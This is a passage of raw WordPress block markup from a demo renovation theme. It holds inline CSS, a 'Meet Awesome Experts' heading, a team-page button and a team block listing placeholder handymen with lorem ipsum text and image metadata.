margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-4bf804fe-a71c-426e-8620-9384e3ade2ba skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingTablet\":30,\"blockId\":\"a230e795-4950-475e-91e7-72865fef243e\"} -->\n<style type=\"text/css\"> .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-a230e795-4950-475e-91e7-72865fef243e\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"7efc2986-5992-4078-a8f0-585e7384483c\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":17,\"headingTitleFontSizeTablet\":17,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-7efc2986-5992-4078-a8f0-585e7384483c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Leaderships</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Meet Awesome<br>Experts</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"29fe60f7-45c5-43bc-9f5b-528bb0f13ac2\"} -->\n<style type=\"text/css\"> .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All Team Member\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\",\"counterId\":\"a982759b-8eb1-4278-8e6d-30ac05e73771\",\"vPadding\":20,\"hPadding\":30,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#ff5e14\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":17,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"500\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 20px; padding-bottom: 20px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 30px; padding-right: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 17px; font-family: Poppins; font-weight: 500; line-height: undefined; opacity: 1; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #ff5e14; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 17px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\">View All Team Member</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"emailAddress\":\"\",\"twitterUrl\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"count\":4,\"gutter\":\"small\",\"designationColor\":\"#494848\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"titleFontSize\":20,\"imageMarginTop\":50,\"imageMarginBottom\":20,\"titleSpacing\":0,\"imageWidth\":260,\"borderWidth\":0,\"borderRadius\":0,\"padding\":0,\"imageShape\":\"square\",\"opacity\":0,\"backgroundPosition\":\"left top\",\"showDescription\":false,\"showSocialIcons\":false} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-4-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:0;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:50px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400\"><p>Handyman</p></div></div></div></div>\n<!-- /wp:skt-blocks/team --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ec6e65f8-ff22-4968-af3a-cce4cc21b8a3\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":98,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-8\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-8 skt-blocks-block-section-outer-wrap block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 98px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ec6e65f8-ff22-4968-af3a-cce4cc21b8a3.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n 